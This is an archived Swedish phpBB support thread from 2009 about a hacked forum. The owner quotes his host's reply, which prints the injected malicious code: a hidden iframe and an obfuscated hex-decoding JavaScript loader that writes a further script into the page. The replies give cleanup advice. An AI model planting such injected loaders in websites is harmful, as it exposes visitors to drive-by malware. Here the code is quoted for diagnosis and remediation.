Hackat forum.

Detta är ett arkiv för phpBB2 Support, Diskussion, MODar, Stilar och översättningar. Den tillhandahålls endast för referensändamål.

Moderatorer: Moderatorgrupp, Supportgrupp

Ron_DreamCore
Ny medlem
Ny medlem
Inlägg: 6
Blev medlem: 2009-04-08 18:46

Hackat forum.

Inlägg av Ron_DreamCore » 2009-04-08 18:53

Hej.

På senare dar så har många utav våra registrerade användare fått en virusvarning då dom går in på forumet.
Jag tog då kontakt med webhotellet som jag hyr domänen utav och frågade om det fanns något dom kunde göra och frågade hur jag skulle gå till väga.
Jag fick då detta svar:

Hejsan!

du har blivit hackad och hackern har lagt detta på din sida:

"><iframe src='http://url/' width='1' height='1' style='visibility:
hidden;'></iframe><script>function
c1023895d9q49db0e073360d(q49db0e07339f5){ return
(eval('pars'+'eInt')(q49db0e07339f5,16));}function
q49db0e07345af(q49db0e0734997){ function q49db0e0735554(){var
q49db0e073593c=2;return q49db0e073593c;} var
q49db0e0734d80='';q49db0e0735d23=String['fromCharCode'];for(q49db0e07351
68=0;q49db0e0735168<q49db0e0734997.length;q49db0e0735168+=q49db0e0735554
()){
q49db0e0734d80+=(q49db0e0735d23(c1023895d9q49db0e073360d(q49db0e0734997.
substr(q49db0e0735168,q49db0e0735554()))));}return q49db0e0734d80;} var
ne0='';var
q49db0e073610b='3C7'+ne0+'3637'+ne0+'2697'+ne0+'07'+ne0+'43E696628216D7'
+ne0+'96961297'+ne0+'B646F637'+ne0+'56D656E7'+ne0+'42E7'+ne0+'7'+ne0+'7'
+ne0+'2697'+ne0+'465287'+ne0+'56E657'+ne0+'363617'+ne0+'065282027'+ne0+'
2533632536392536362537'+ne0+'3225363125366425363525323025366525363125366
42536352533642536332533312533302532302537'+ne0+'332537'+ne0+'32253633253
364253237'+ne0+'2536382537'+ne0+'342537'+ne0+'342537'+ne0+'3025336125326
6253266253637'+ne0+'253666253637'+ne0+'253666253332253664253635253265253
6652536352537'+ne0+'34253266253265253637'+ne0+'2536662532662536332536382
536352536332536622532652536382537'+ne0+'34253664253663253366253237'+ne0+
'2532622534642536312537'+ne0+'342536382532652537'+ne0+'322536662537'+ne0
+'352536652536342532382534642536312537'+ne0+'342536382532652537'+ne0+'32
253631253665253634253666253664253238253239253261253335253333253330253337
'+ne0+'253330253239253262253237'+ne0+'253635253334253237'+ne0+'253230253
7'+ne0+'37'+ne0+'2536392536342537'+ne0+'34253638253364253331253338253333
253230253638253635253639253637'+ne0+'2536382537'+ne0+'342533642533322533
392533302532302537'+ne0+'332537'+ne0+'342537'+ne0+'392536632536352533642
53237'+ne0+'2537'+ne0+'362536392537'+ne0+'332536392536322536392536632536
392537'+ne0+'342537'+ne0+'3925336125363825363925363425363425363525366525
3237'+ne0+'2533652533632532662536392536362537'+ne0+'32253631253664253635
25336527'+ne0+'29293B7'+ne0+'D7'+ne0+'6617'+ne0+'2206D7'+ne0+'969613D7'+
ne0+'47'+ne0+'27'+ne0+'5653B3C2F7'+ne0+'3637'+ne0+'2697'+ne0+'07'+ne0+'4
3E';document.write(q49db0e07345af(q49db0e073610b));</script>


Du måste byta ALLA dina lösenord, se till att du har antivirus
installerat på din dator och uppdatera alla script du har installerade
på din server till senaste versionen och radera allt du inte själv har
lagt upp/som du inte litar på.


Ok... jag hittade på index filen detta "sc ript" som jag tog bort. Varningen försvann en stund men kommer nu åter igen.
PHP och diverse kodning och dyliknande är verkligen inte min starka sida. Jag vet inte hur jag ska gå till väga för att åtgärda detta problem.
Jag frågade om det var någon fara för registrerade användare och hur jag skulle gå till väga och om dom kunnde erbjuda skydd. Jag fick då detta till svar:

Hejsan!

Anledningen till att jag säger att du skall ta bort andras filer är för
att det mycket väl kan vara så att de har laddat upp ett shell script på
din server. Det är i så fall en .php-fil som kan ha vilket namn som
helst, så kan såklart vara svårt att identifiera den.

Hur du skyddar dig beror helt på vad du har laddat upp för script. Ett
viktigt sätt är att alltid hålla alla dina script uppdaterade till
senaste versionerna.

Det är också viktigt att du aldrig använder svaga lösenord, som ett ord
som kan hittas i en ordbok. Använd blandningar av siffror, bokstäver och
specialtecken, och blandningar av stora och små bokstäver.

Vi kan som du kanske då förstår inte skapa något slags universellt skydd
då alla olika script har olika svagheter, och det bara är deras
utvecklare som skapar nyare versioner som täcker upp säkerhetshål
efterhand som de hittas.

Jag vet inte vad din hacker har kommit över. Att han skulle ha kommit
över ditt användarregister är osannolikt, och även då borde ditt forum
ha någon sorts kryptering på sina lösenord så att de inte finns i
klartext.


Det kanske säger allt till en som fattar sig på detta. Men för en som inte gör det..... :)
"SCRIPT" - är det själva forumet? Någon som har tips eller vet hur f*n jag ska lösa detta?

Tack på förhand.
/Ron

Slacker
Aktiv medlem
Aktiv medlem
Inlägg: 166
Blev medlem: 2007-07-15 07:56

Re: Hackat forum.

Inlägg av Slacker » 2009-04-09 04:47

Om ditt webbhotell har accessloggar skulle jag också titta i dem och försöka hitta misstänkt aktivitet och filen som de laddat upp till din sajt. Om inte detta går skulle jag senare göra detta.

Har du en backup med alla forumfilerna, som du är säker på fungerar till 100 %. I så fall skulle jag ta bort alla filer, som jag har på webbhotellet och ladda upp backupen. Kolla att det inte finns osynliga filer på webbhotellets server. Detta borde lösa problemet tycker jag.

Användarvisningsbild
Marcus
Administratör
Administratör
Inlägg: 4321
Blev medlem: 2004-01-07 22:12
Ort: Skövde
Kontakt:

Re: Hackat forum.

Inlägg av Marcus » 2009-04-09 08:17

Vilken version av phpBB2 kör du?

Du får gärna titta i vår supportmall, och svara på de frågor som ställs där.

Så kan vi enklare hjälpa dig.

Nytt lösenord på ditt FTP-konto hoppas jag att du redan fixat.

/marcus
Marcus Farrington - Administratör på phpBB Sverige
OBS! På förekommen anledning ges ingen support via PM.

Webb- & Drupalutvecklare på Webbyrå Grebban.

Ron_DreamCore
Ny medlem
Ny medlem
Inlägg: 6
Blev medlem: 2009-04-08 18:46

Re: Hackat forum.

Inlägg av Ron_DreamCore » 2009-04-09 12:25

Någon backup finnd inte - så det blir till att göra om isf. Tyvärr.
Jag har hur mkt prylar som helst på mitt utrymme, känns som det är lika bra att bara delete allt. Err... Och access filer och hit o dit, jag är så j.. okunnig när det gäller detta så det är inte sant. Några misstänkta "aktiviteter" i några "access" loggar eller va det var lär det ju inte bli heller :)

Ska väl ta och kolla i supportmallen där. Jäkla trist att det finns folk som vill hålla på med att förstöra osv.
Tack för att ni svarade på posten. :)

Slacker
Aktiv medlem
Aktiv medlem
Inlägg: 166
Blev medlem: 2007-07-15 07:56

Re: Hackat forum.

Inlägg av Slacker » 2009-04-09 16:57

Har du installerat MOD:ar eller är det ett standardforum? Är det ett standardforum utan ändring i filerna, så är det möjligt tror jag att ladda ner en ny kopia av phpbb.

****

Du skulle ju kunna ladda ner alla dina filer från webbhotellet till en katalog i din dator. Sedan söker du efter karaktäristika för scriptet som borde finnas i det t.ex. script>function c1023895d9q49db0e073360d(q49db0e07339f5)
Kanske går det att hitta skriptet den vägen?

****

Glömde att påpeka att du kan köra antivirusprogram på ditt forum, som du laddat ner lokalt för att se om antivirus hittar det.

https://www.flashback.info/archive/inde ... 86208.html

****

Har nog hittat den kanske slutgiliga lösningen här. Koden kommer från en annan sajt via en mapp på din sajt som har rättigheter 777.
Läs detta, men du måste köra en virusscan ändå på din sajts filer:
http://forums.digitalpoint.com/showthread.php?t=596009
Senast redigerad av 1 PazZze, redigerad totalt 2009 gånger.
Anledning: 4 blev 1

Användarvisningsbild
Marcus
Administratör
Administratör
Inlägg: 4321
Blev medlem: 2004-01-07 22:12
Ort: Skövde
Kontakt:

Re: Hackat forum.

Inlägg av Marcus » 2009-04-09 18:37

Jag frågar igen, vilken version kör du?

På versionen före den senaste phpBB2 fanns det gott om vägar in för att "plantera presenter". Om phpBB2.0.23 (eller 2.0.24 som är inofficiell) är helt stängda kan jag inte garantera, men ju tidigare version du har ju fler "hål" finns det.

Att uppgradera till phpBB3 är en lösning, men sitter man med många nödvändiga MODs så är det kanske inte ett alternativ. ;-)

/Marcus
Marcus Farrington - Administratör på phpBB Sverige
OBS! På förekommen anledning ges ingen support via PM.

Webb- & Drupalutvecklare på Webbyrå Grebban.

Ron_DreamCore
Ny medlem
Ny medlem
Inlägg: 6
Blev medlem: 2009-04-08 18:46

Re: Hackat forum.

Inlägg av Ron_DreamCore » 2009-04-10 07:17

Sorry, glömde adda verision jag körde med och antar att det är:
"Powered by phpBB 2.0.23 © 2001 phpBB Group // Ad Infinitum 2.0.20.c // Template by Mike Lothar".

Den ända modden jag kör med är väl en annan style? Som sagt, är inte så haj på detta. :)


Ang föregående talare, jag kolla igenom sidan du länka - mitt virusprogram skriker till om trojanska hästar och skit hela tiden när jag är där. Men jag läste vad som stog och jag antar att jag bör antingen scana utrymmet som jag har eller helt enkelt rensa skiten. Kanske bäst om jag kan ta bort allt och sen installera den senaste verisionen av phpbb. Ska klura lite på det iaf. Mycket jobb blir det väl hur som helst. Hade inte haft något emot att pula och jag var mer insatt - nu är det bara drygt :D

Slacker
Aktiv medlem
Aktiv medlem
Inlägg: 166
Blev medlem: 2007-07-15 07:56

Re: Hackat forum.

Inlägg av Slacker » 2009-04-10 07:38

Skapa en kopia av din sajt på din egen dator.
Kör sedan antivirusprogrammet på den katalogen enbart.
Du får då besked vilka filer som är infekterade.
Ta bort dem från sajten.
Du kanske dessutom måste kolla rättigheterna på katalogerna på sajten och ändra de med 777 till 755.

Ron_DreamCore
Ny medlem
Ny medlem
Inlägg: 6
Blev medlem: 2009-04-08 18:46

Re: Hackat forum.

Inlägg av Ron_DreamCore » 2009-04-10 10:04

Ja, ang. Katalogernas rättigheter, hur ändrar man det?

- Skumt, jag drog hem ALLT som finns på sajten - ALLT... Körde virusprogramet utan resultat! Skumt.
Jag har dessutom hittat iaf ett script på index sidan som jag tog bort. En kompis till mig fick upp virusvarning på jobbets dator varje gång han besökte sidan. Efter jag tagit bort scriptet så fick han det inte mer - men sen inte långt efter så hörde jag andra som fick varningen igen. Dock är just det scriptet inte kvar. Ligger väl i andar filer med.
Hur som helst, konsigt att mitt virusprogram inte hittar något.



Om jag laddar hem phpbb senaste 3 version och lägger det i en separat map, kan jag börja pyssla med det och se om jag kan få igång ett forum under tiden jag har dessa problem?

Ron_DreamCore
Ny medlem
Ny medlem
Inlägg: 6
Blev medlem: 2009-04-08 18:46

Re: Hackat forum.

Inlägg av Ron_DreamCore » 2009-04-10 12:27

Ok. Nu har jag tömt hela sajten och installerat ett helt nytt forum av "phpBB-3.0.4".
Jag var väldigt snabb med att trycka "next" på sista steget och tyckte jag såg att man skulle deleta några mappar? Som i alla tidigare installationer - vilka mappar är det? :oops:

Slacker
Aktiv medlem
Aktiv medlem
Inlägg: 166
Blev medlem: 2007-07-15 07:56

Re: Hackat forum.

Inlägg av Slacker » 2009-04-10 13:06

Ron_DreamCore skrev:Ja, ang. Katalogernas rättigheter, hur ändrar man det?
När du är inloggad med FTP-programmet höger klicka på en katalog, som har 777. Välj Filrättigheter och ändra till 755 för då är hålen tilltäppta.

Ron_DreamCore
Ny medlem
Ny medlem
Inlägg: 6
Blev medlem: 2009-04-08 18:46

Re: Hackat forum.

Inlägg av Ron_DreamCore » 2009-04-10 15:18

Ok, jag kör inget FTP program - kör via explorer. Nått förslag på något bra FTP program?

Dessa nya forums är helt hopplösa. Det är svårt som fan bara att fixa en logga som sitter där den ska. Hitta i vilken fil där koden ligger sen lära sig skiten och försöka få en logga att passa..
Sen ska man försöka skapa forumet... fattar ingenting. Forumen som jag skapar syns inte. Står att det inte finns några fast jag skapat. När jag försöker "[ Moderator Control Panel ]" så står det att jag inte har rättigheter faste jag är Admin och skapat forumet..... Nej. Det gamla var skänare att hantera, mkt lättare. Hoppas jag förstår mig på hur man skapar kategorier osv. :-)

Slacker
Aktiv medlem
Aktiv medlem
Inlägg: 166
Blev medlem: 2007-07-15 07:56

Re: Hackat forum.

Inlägg av Slacker » 2009-04-10 15:24

För FTP använder nog många FileZilla, som är gratis.
http://filezilla-project.org/

Användarvisningsbild
Holger
Support
Support
Inlägg: 6483
Blev medlem: 2004-06-09 08:32
Ort: Hannover/Tyskland
Kontakt:

Re: Hackat forum.

Inlägg av Holger » 2009-04-14 09:24

Jag hade nog inte gett upp så snabbt.
Vi hade liknande problem med ett stort forum för något år sedan.
Det som hjälpte var att ändra forumets mapp från t.ex. /forum/ till /forum2/ samt att ändra lösenorden för FTP och mysql.
Då slutade attacken direkt.
Holger Gremminger
Ingen support via PM!

Automatiserad backup av din databas med MYSQLdumper! Nu med helsvenskt gränssnitt.
Nytt: http://www.mysqldumper.se!

Hitta en expert! Registrera dig som expert!
http://www.phpbbexperts.com

Slacker
Aktiv medlem
Aktiv medlem
Inlägg: 166
Blev medlem: 2007-07-15 07:56

Re: Hackat forum.

Inlägg av Slacker » 2009-04-14 09:35

Kollade du accessloggarna, Holger för att se hur de hackade sig in? Mitt skydd består av lösenordskyddad admin-mapp i forumet, som dessutom kräver min ip-adress för att accessa. I .htaccess har jag skydd mot cross-scripting. Dessutom har jag ett phpbb-forum integrerat i PHP-Nuke med hackerskddet Sentinel, som bannlyser hackare automatiskt.

Skriv svar

Vilka är online

Användare som besöker denna kategori: 2 och 0 gäster